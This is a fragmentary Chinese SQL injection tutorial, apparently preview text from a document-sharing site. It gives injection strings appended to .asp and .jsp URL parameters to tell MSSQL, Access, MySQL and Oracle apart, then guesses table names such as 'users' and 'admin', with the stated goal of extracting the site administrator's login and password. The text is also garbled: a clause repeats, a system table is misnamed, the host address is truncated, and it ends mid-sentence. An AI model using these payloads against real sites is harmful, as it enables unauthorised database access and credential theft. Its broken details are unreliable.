SQL注入精解.docVIP

判断数据库的类型 28:8181/aspsql/news.asp?id=1 and exists(select * from sysobjects) 判断，sysobjects是mssql系统自带的表). sysobjects是mssql系统自带的表 mysysobjects是access的系统表 xx.jsp?id=1/*返回错误(“/*”是mysql中的注释符) xx.jsp?id=1--返回正常 //(“--“是oracle和mssql支持的注释符) xx.jsp?id=1;返回错误 //(oracle不支持多行查询) xx.jsp?id=1 and exists(select * from dual) //(dual是oracle中的系统表) 获取后台管理员登陆帐号密码 猜数据表名 下面我们来进一步获取我们想要的信息 一般网站重要的信息就是后台管理员登陆帐号密码了，我们提交28:8181/bbs/gshow.asp?id=1 and exists(select * from users) （判断数据库中是否存在users表） 根据图中返回结果提示users表不存在，那么我们继续来提交 28:8181/bbs/gshow.asp?id=1 and exists(select * from admin) 服务器端返回的数据和28:8181/bbs/gshow.